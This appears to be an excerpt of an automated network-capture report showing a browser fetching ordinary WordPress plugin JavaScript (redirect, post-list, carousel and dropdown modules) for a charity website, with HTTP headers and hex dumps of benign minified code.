                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC699INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 65 77 57 69 6e 64 6f 77 41 72 72 3d 71 70 70 72 46 72 6f 6e 74 44 61 74 61 2e 6c 69 6e 6b 44 61 74 61 3b 76 61 72 20 72 6f 6f 74 3d 71 70 70 72 46 72 6f 6e 74 44 61 74 61 2e 73 69 74 65 55 52 4c 3b 76 61 72 20 71 72 6f 6f 74 3d 71 70 70 72 46 72 6f 6e 74 44 61 74 61 2e 73 69 74 65 55 52 4c 71 3b 24 28 27 61 5b 68 72 65 66 5d 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 68 69 73 4d 61 74 63 68 3d 24 28 74 68 69 73 29 3b 76 61 72 20 68 72 65 66 3d 74 79 70 65 6f 66 20 24 28 74 68 69 73 29 2e 61 74 74 72 28 27 68 72 65 66 27 29 21 3d 3d 27 75 6e 64 65 66 69 6e 65 64 27 3f 24 28 74 68 69 73
                                                                                                                                                                                                                                                        Data Ascii: ;(function($){$(document).ready(function(){var newWindowArr=qpprFrontData.linkData;var root=qpprFrontData.siteURL;var qroot=qpprFrontData.siteURLq;$('a[href]').each(function(){var thisMatch=$(this);var href=typeof $(this).attr('href')!=='undefined'?$(this
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC891INData Raw: 6c 61 63 65 28 72 6f 6f 74 2c 27 27 29 5d 5b 30 5d 3b 64 6f 4e 46 3d 6e 65 77 57 69 6e 64 6f 77 41 72 72 5b 68 72 65 66 2e 72 65 70 6c 61 63 65 28 72 6f 6f 74 2c 27 27 29 5d 5b 31 5d 3b 72 55 52 4c 3d 6e 65 77 57 69 6e 64 6f 77 41 72 72 5b 68 72 65 66 2e 72 65 70 6c 61 63 65 28 72 6f 6f 74 2c 27 27 29 5d 5b 32 5d 3b 68 43 68 6b 3d 68 72 65 66 2e 72 65 70 6c 61 63 65 28 72 6f 6f 74 2c 27 27 29 3b 7d 65 6c 73 65 20 69 66 28 6c 69 6e 6b 46 6f 75 6e 64 3d 3d 27 33 27 29 7b 64 6f 4e 57 3d 6e 65 77 57 69 6e 64 6f 77 41 72 72 5b 68 72 65 66 2e 72 65 70 6c 61 63 65 28 71 72 6f 6f 74 2c 27 27 29 5d 5b 30 5d 3b 64 6f 4e 46 3d 6e 65 77 57 69 6e 64 6f 77 41 72 72 5b 68 72 65 66 2e 72 65 70 6c 61 63 65 28 71 72 6f 6f 74 2c 27 27 29 5d 5b 31 5d 3b 72 55 52 4c 3d 6e 65
                                                                                                                                                                                                                                                        Data Ascii: lace(root,'')][0];doNF=newWindowArr[href.replace(root,'')][1];rURL=newWindowArr[href.replace(root,'')][2];hChk=href.replace(root,'');}else if(linkFound=='3'){doNW=newWindowArr[href.replace(qroot,'')][0];doNF=newWindowArr[href.replace(qroot,'')][1];rURL=ne


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        51192.168.2.449803192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC626OUTGET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/post-list.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC670INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:13 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 3892
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/post-list.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 01:15:24 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC699INData Raw: 76 6f 69 64 20 30 3d 3d 3d 54 43 42 5f 46 72 6f 6e 74 2e 6a 73 5f 6d 6f 64 75 6c 65 73 5b 22 70 6f 73 74 2d 6c 69 73 74 22 5d 26 26 54 43 42 5f 46 72 6f 6e 74 2e 73 65 74 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 53 74 61 74 75 73 28 22 70 6f 73 74 2d 6c 69 73 74 22 2c 21 31 29 2c 28 74 3d 3e 7b 69 66 28 21 54 43 42 5f 46 72 6f 6e 74 2e 69 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 22 70 6f 73 74 2d 6c 69 73 74 22 29 29 7b 74 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 74 63 62 5f 61 66 74 65 72 5f 64 6f 6d 5f 72 65 61 64 79 22 2c 28 28 29 3d 3e 7b 74 28 22 2e 74 63 62 2d 70 6f 73 74 2d 6c 69 73 74 22 29 2e 65 61 63 68 28 28 28 69 2c 73 29 3d 3e 7b 6e 65 77 20 65 28 74 28 73 29 29 2e 72 65 6e 64 65 72 50 61 67 69 6e 61 74 69 6f 6e 28 29 7d 29 29 7d 29 29 3b 63 6c 61
                                                                                                                                                                                                                                                        Data Ascii: void 0===TCB_Front.js_modules["post-list"]&&TCB_Front.setModuleLoadedStatus("post-list",!1),(t=>{if(!TCB_Front.isModuleLoaded("post-list")){t(window).on("tcb_after_dom_ready",(()=>{t(".tcb-post-list").each(((i,s)=>{new e(t(s)).renderPagination()}))}));cla
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 61 69 6e 65 72 22 29 3b 74 2e 61 74 74 72 28 22 64 61 74 61 2d 63 61 72 6f 75 73 65 6c 2d 73 65 74 74 69 6e 67 73 22 2c 64 65 63 6f 64 65 55 52 49 28 74 2e 61 74 74 72 28 22 64 61 74 61 2d 63 61 72 6f 75 73 65 6c 2d 73 65 74 74 69 6e 67 73 22 29 29 29 2c 74 68 69 73 2e 63 61 72 6f 75 73 65 6c 3d 6e 65 77 20 54 43 42 5f 46 72 6f 6e 74 2e 43 61 72 6f 75 73 65 6c 28 74 68 69 73 29 2c 74 68 69 73 2e 63 61 72 6f 75 73 65 6c 2e 69 6e 69 74 43 61 72 6f 75 73 65 6c 28 29 7d 7d 67 65 74 50 61 67 69 6e 61 74 69 6f 6e 49 6e 73 74 61 6e 63 65 28 29 7b 69 66 28 74 68 69 73 2e 6c 69 73 74 41 72 67 73 26 26 74 68 69 73 2e 6c 69 73 74 41 72 67 73 2e 61 74 74 72 29 7b 63 6f 6e 73 74 20 74 3d 74 68 69 73 2e 6c 69 73 74 41 72 67 73 2e 61 74 74 72 5b 22 70 61 67 69 6e 61 74
                                                                                                                                                                                                                                                        Data Ascii: ainer");t.attr("data-carousel-settings",decodeURI(t.attr("data-carousel-settings"))),this.carousel=new TCB_Front.Carousel(this),this.carousel.initCarousel()}}getPaginationInstance(){if(this.listArgs&&this.listArgs.attr){const t=this.listArgs.attr["paginat
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 65 6d 70 6c 61 74 65 5b 64 61 74 61 2d 69 64 65 6e 74 69 66 69 65 72 3d 22 27 2b 74 68 69 73 2e 6c 69 73 74 41 72 67 73 2e 74 65 6d 70 6c 61 74 65 2b 27 22 5d 27 29 2e 68 74 6d 6c 28 29 29 29 7d 67 65 74 41 74 74 72 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 74 74 72 28 74 29 7d 67 65 74 49 74 65 6d 73 28 74 2c 65 3d 74 68 69 73 2e 6c 69 73 74 41 72 67 73 29 7b 54 43 42 5f 46 72 6f 6e 74 2e 55 74 69 6c 73 2e 72 65 73 74 41 6a 61 78 28 7b 72 6f 75 74 65 3a 74 76 65 5f 66 72 6f 6e 74 65 6e 64 5f 6f 70 74 69 6f 6e 73 2e 72 6f 75 74 65 73 2e 70 6f 73 74 73 2b 22 2f 68 74 6d 6c 22 2c 64 61 74 61 3a 7b 63 6f 6e 74 65 6e 74 3a 74 68 69 73 2e 63 6f 6e 74 65 6e 74 2c 61 72 67 73 3a 65 7d 7d 29 2e 64 6f 6e 65 28 28 65 3d 3e 7b 22
                                                                                                                                                                                                                                                        Data Ascii: emplate[data-identifier="'+this.listArgs.template+'"]').html()))}getAttr(t){return this.$element.attr(t)}getItems(t,e=this.listArgs){TCB_Front.Utils.restAjax({route:tve_frontend_options.routes.posts+"/html",data:{content:this.content,args:e}}).done((e=>{"
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC455INData Raw: 61 74 61 28 22 6d 61 73 6f 6e 72 79 22 29 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 66 69 6e 64 28 60 24 7b 74 68 69 73 2e 6c 69 73 74 49 64 65 6e 74 69 66 69 65 72 7d 3a 6e 6f 74 28 2e 6d 61 73 6f 6e 72 79 2d 62 72 69 63 6b 29 60 29 3b 74 2e 6d 61 73 6f 6e 72 79 28 22 61 70 70 65 6e 64 65 64 22 2c 65 29 2c 74 2e 6d 61 73 6f 6e 72 79 28 22 6c 61 79 6f 75 74 22 29 7d 7d 69 6e 69 74 49 74 65 6d 73 28 29 7b 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 22 2e 74 63 62 2d 63 75 73 74 6f 6d 2d 66 69 65 6c 64 2d 73 6f 75 72 63 65 2e 74 68 72 76 2d 72 61 74 69 6e 67 22 29 2e 6c 65 6e 67 74 68 7c 7c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 22 5b 64 61 74 61 2d 73 68 6f 72 74 63 6f 64 65 2d 69 64 2a 3d 27 61 63 66 5f 27 5d 22 29 2e 6c 65 6e
                                                                                                                                                                                                                                                        Data Ascii: ata("masonry")){const e=t.find(`${this.listIdentifier}:not(.masonry-brick)`);t.masonry("appended",e),t.masonry("layout")}}initItems(){(this.$element.find(".tcb-custom-field-source.thrv-rating").length||this.$element.find("[data-shortcode-id*='acf_']").len


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        52192.168.2.449807192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC451OUTGET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/carousel.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC669INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:13 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 4161
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/carousel.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 01:15:24 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC700INData Raw: 28 28 29 3d 3e 7b 76 61 72 20 74 3d 7b 39 34 31 38 35 3a 74 3d 3e 7b 76 6f 69 64 20 30 3d 3d 3d 54 43 42 5f 46 72 6f 6e 74 2e 6a 73 5f 6d 6f 64 75 6c 65 73 2e 63 61 72 6f 75 73 65 6c 26 26 54 43 42 5f 46 72 6f 6e 74 2e 73 65 74 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 53 74 61 74 75 73 28 22 63 61 72 6f 75 73 65 6c 22 2c 21 31 29 2c 66 75 6e 63 74 69 6f 6e 28 73 2c 65 29 7b 69 66 28 54 43 42 5f 46 72 6f 6e 74 2e 69 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 22 63 61 72 6f 75 73 65 6c 22 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 69 3d 7b 74 61 62 6c 65 74 3a 31 30 32 33 2c 6d 6f 62 69 6c 65 3a 37 36 37 7d 3b 63 6c 61 73 73 20 6f 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 74 29 7b 74 68 69 73 2e 63 61 72 6f 75 73 65 6c 3d 74 2c 74 68 69 73 2e 24 63 61 72 6f 75 73
                                                                                                                                                                                                                                                        Data Ascii: (()=>{var t={94185:t=>{void 0===TCB_Front.js_modules.carousel&&TCB_Front.setModuleLoadedStatus("carousel",!1),function(s,e){if(TCB_Front.isModuleLoaded("carousel"))return;const i={tablet:1023,mobile:767};class o{constructor(t){this.carousel=t,this.$carous
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 2e 72 65 73 70 6f 6e 73 69 76 65 29 29 5b 22 74 61 62 6c 65 74 22 3d 3d 3d 65 3f 30 3a 31 5d 3b 6c 65 74 20 61 3b 72 65 74 75 72 6e 20 61 3d 22 64 65 73 6b 74 6f 70 22 21 3d 3d 65 26 26 6f 26 26 6f 2e 62 72 65 61 6b 70 6f 69 6e 74 3d 3d 3d 69 5b 65 5d 26 26 76 6f 69 64 20 30 21 3d 3d 6f 2e 73 65 74 74 69 6e 67 73 5b 73 5d 3f 6f 2e 73 65 74 74 69 6e 67 73 5b 73 5d 3a 74 5b 73 5d 2c 61 7d 73 74 61 74 69 63 20 73 65 74 44 6f 74 73 28 74 2c 73 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 70 61 72 65 6e 74 73 28 27 2e 74 63 62 2d 69 6d 61 67 65 2d 67 61 6c 6c 65 72 79 2c 5b 64 61 74 61 2d 74 79 70 65 3d 22 63 61 72 6f 75 73 65 6c 22 5d 27 29 3b 73 26 26 28 74 2e 6c 65 6e 67 74 68 26 26 30 3d 3d 3d 65 2e 66 69 6e 64 28
                                                                                                                                                                                                                                                        Data Ascii: (JSON.stringify(t.responsive))["tablet"===e?0:1];let a;return a="desktop"!==e&&o&&o.breakpoint===i[e]&&void 0!==o.settings[s]?o.settings[s]:t[s],a}static setDots(t,s){const e=t.parents('.tcb-image-gallery,[data-type="carousel"]');s&&(t.length&&0===e.find(
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 2d 6c 69 73 74 22 2c 28 28 29 3d 3e 7b 64 65 6c 65 74 65 20 74 68 69 73 2e 43 41 52 4f 55 53 45 4c 5f 46 4f 43 55 53 2c 73 65 74 54 69 6d 65 6f 75 74 28 28 28 29 3d 3e 7b 74 68 69 73 2e 24 63 61 72 6f 75 73 65 6c 2e 66 69 6e 64 28 6f 2e 65 6c 65 6d 65 6e 74 73 57 69 74 68 4c 69 6e 6b 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 74 63 62 2d 64 75 72 69 6e 67 2d 64 72 61 67 22 29 7d 29 2c 35 30 29 7d 29 29 7d 69 6e 69 74 43 61 72 6f 75 73 65 6c 28 74 3d 21 31 29 7b 63 6f 6e 73 74 20 69 3d 74 68 69 73 2e 24 63 61 72 6f 75 73 65 6c 2e 66 69 6e 64 28 6f 2e 63 61 72 6f 75 73 65 6c 43 6f 6e 74 61 69 6e 65 72 53 65 6c 65 63 74 6f 72 29 2c 61 3d 65 2e 55 74 69 6c 73 2e 6a 73 6f 6e 50 61 72 73 65 28 69 2c 22 64 61 74 61 2d 63 61 72 6f 75 73 65 6c 2d 73 65 74 74
                                                                                                                                                                                                                                                        Data Ascii: -list",(()=>{delete this.CAROUSEL_FOCUS,setTimeout((()=>{this.$carousel.find(o.elementsWithLinks).removeClass("tcb-during-drag")}),50)}))}initCarousel(t=!1){const i=this.$carousel.find(o.carouselContainerSelector),a=e.Utils.jsonParse(i,"data-carousel-sett
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC723INData Raw: 6c 65 63 74 6f 72 29 2e 65 61 63 68 28 28 28 74 2c 69 29 3d 3e 7b 63 6f 6e 73 74 20 61 3d 73 28 69 29 2c 6c 3d 65 2e 55 74 69 6c 73 2e 6a 73 6f 6e 50 61 72 73 65 28 61 2e 66 69 6e 64 28 6f 2e 63 61 72 6f 75 73 65 6c 43 6f 6e 74 61 69 6e 65 72 53 65 6c 65 63 74 6f 72 29 2c 22 64 61 74 61 2d 63 61 72 6f 75 73 65 6c 2d 73 65 74 74 69 6e 67 73 22 29 2c 72 3d 61 2e 68 61 73 43 6c 61 73 73 28 22 74 63 62 2d 67 61 6c 6c 65 72 79 2d 63 72 6f 70 22 29 3b 6f 2e 73 65 74 44 6f 74 73 28 61 2e 66 69 6e 64 28 22 75 6c 2e 74 63 62 2d 63 61 72 6f 75 73 65 6c 2d 64 6f 74 73 22 29 2c 6c 2e 74 63 62 44 6f 74 73 29 2c 74 68 69 73 2e 69 73 45 64 69 74 6f 72 26 26 72 26 26 54 56 45 2e 43 6f 6d 70 6f 6e 65 6e 74 73 2e 69 6d 61 67 65 5f 67 61 6c 6c 65 72 79 2e 63 72 6f 70 49 6d
                                                                                                                                                                                                                                                        Data Ascii: lector).each(((t,i)=>{const a=s(i),l=e.Utils.jsonParse(a.find(o.carouselContainerSelector),"data-carousel-settings"),r=a.hasClass("tcb-gallery-crop");o.setDots(a.find("ul.tcb-carousel-dots"),l.tcbDots),this.isEditor&&r&&TVE.Components.image_gallery.cropIm


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        53192.168.2.449805192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC625OUTGET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/dropdown.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC669INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:13 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 4909
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/dropdown.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 01:15:24 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC700INData Raw: 76 6f 69 64 20 30 3d 3d 3d 54 43 42 5f 46 72 6f 6e 74 2e 6a 73 5f 6d 6f 64 75 6c 65 73 2e 64 72 6f 70 64 6f 77 6e 26 26 54 43 42 5f 46 72 6f 6e 74 2e 73 65 74 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 53 74 61 74 75 73 28 22 64 72 6f 70 64 6f 77 6e 22 2c 21 31 29 2c 28 74 3d 3e 7b 69 66 28 54 43 42 5f 46 72 6f 6e 74 2e 69 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 22 64 72 6f 70 64 6f 77 6e 22 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 65 3d 22 2e 74 76 65 5f 6c 67 5f 64 72 6f 70 64 6f 77 6e 2c 20 2e 74 63 62 2d 66 6f 72 6d 2d 64 72 6f 70 64 6f 77 6e 2c 20 2e 74 76 65 2d 64 79 6e 61 6d 69 63 2d 64 72 6f 70 64 6f 77 6e 22 3b 74 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 74 63 62 5f 61 66 74 65 72 5f 64 6f 6d 5f 72 65 61 64 79 22 2c 28 28 29 3d 3e 7b 69 66 28 21 54
                                                                                                                                                                                                                                                        Data Ascii: void 0===TCB_Front.js_modules.dropdown&&TCB_Front.setModuleLoadedStatus("dropdown",!1),(t=>{if(TCB_Front.isModuleLoaded("dropdown"))return;const e=".tve_lg_dropdown, .tcb-form-dropdown, .tve-dynamic-dropdown";t(window).on("tcb_after_dom_ready",(()=>{if(!T
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 6d 70 6c 65 74 65 22 2c 22 6f 66 66 22 29 7d 29 29 3b 6c 65 74 20 6e 3d 22 22 3b 63 6f 6e 73 74 20 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 22 22 2c 74 28 22 2e 74 76 65 2d 6c 67 2d 64 72 6f 70 64 6f 77 6e 2d 73 65 61 72 63 68 22 29 2e 6c 65 6e 67 74 68 26 26 74 28 22 2e 74 76 65 2d 6c 67 2d 64 72 6f 70 64 6f 77 6e 2d 73 65 61 72 63 68 22 29 2e 76 61 6c 28 22 22 29 2c 74 28 22 2e 74 76 65 2d 6c 67 2d 64 72 6f 70 64 6f 77 6e 2d 6f 70 74 69 6f 6e 2e 74 76 65 2d 73 74 61 74 65 2d 68 6f 76 65 72 2c 2e 74 76 65 2d 64 79 6e 61 6d 69 63 2d 64 72 6f 70 64 6f 77 6e 2d 6f 70 74 69 6f 6e 2e 74 76 65 2d 73 74 61 74 65 2d 68 6f 76 65 72 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 74 76 65 2d 73 74 61 74 65 2d 68 6f 76 65 72 22 29 7d 2c 72 3d 66 75 6e 63 74 69
                                                                                                                                                                                                                                                        Data Ascii: mplete","off")}));let n="";const d=function(){n="",t(".tve-lg-dropdown-search").length&&t(".tve-lg-dropdown-search").val(""),t(".tve-lg-dropdown-option.tve-state-hover,.tve-dynamic-dropdown-option.tve-state-hover").removeClass("tve-state-hover")},r=functi
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 65 43 6c 61 73 73 28 22 74 76 65 2d 73 74 61 74 65 2d 65 78 70 61 6e 64 65 64 22 29 2c 64 2e 68 61 73 43 6c 61 73 73 28 22 74 76 65 2d 73 74 61 74 65 2d 65 78 70 61 6e 64 65 64 22 29 26 26 28 72 2e 6c 65 6e 67 74 68 3e 30 3f 72 2e 66 69 6e 64 28 22 69 6e 70 75 74 22 29 2e 74 72 69 67 67 65 72 28 22 66 6f 63 75 73 22 29 3a 64 2e 66 69 6e 64 28 22 69 6e 70 75 74 22 29 2e 74 72 69 67 67 65 72 28 22 66 6f 63 75 73 22 29 29 2c 6f 2e 74 61 72 67 65 74 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 74 76 65 2d 6c 67 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 73 74 22 29 7c 7c 6f 2e 74 61 72 67 65 74 2e 63 6c 6f 73 65 73 74 28 22 2e 74 76 65 2d 6c 67 2d 64 72 6f 70 64 6f 77 6e 2d 73 65 61 72 63 68 22 29 29 72 65 74 75 72 6e 20 64 2e 66 69 6e 64 28 22 2e
                                                                                                                                                                                                                                                        Data Ascii: eClass("tve-state-expanded"),d.hasClass("tve-state-expanded")&&(r.length>0?r.find("input").trigger("focus"):d.find("input").trigger("focus")),o.target.classList.contains("tve-lg-dropdown-list")||o.target.closest(".tve-lg-dropdown-search"))return d.find(".
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 2e 6c 65 6e 67 74 68 26 26 69 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 22 74 76 65 5f 64 69 73 70 6c 61 79 22 29 2c 64 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 38 3a 30 3d 3d 3d 61 2e 6c 65 6e 67 74 68 3f 72 28 73 2e 66 69 6e 64 28 22 2e 74 76 65 2d 6c 67 2d 64 72 6f 70 64 6f 77 6e 2d 6f 70 74 69 6f 6e 2c 2e 74 76 65 2d 64 79 6e 61 6d 69 63 2d 64 72 6f 70 64 6f 77 6e 2d 6f 70 74 69 6f 6e 22 29 2e 6c 61 73 74 28 29 2c 73 29 3a 61 2e 70 72 65 76 28 29 2e 6c 65 6e 67 74 68 26 26 72 28 61 2e 70 72 65 76 28 29 2c 73 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 30 3a 30 3d 3d 3d 61 2e 6c 65 6e 67 74 68 3f 72 28 73 2e 66 69 6e 64 28 22 2e 74 76 65 2d 6c 67 2d 64 72 6f 70 64 6f 77 6e 2d 6f 70 74 69 6f 6e 2c 2e 74 76 65 2d 64 79 6e 61 6d 69 63 2d 64 72 6f 70 64 6f
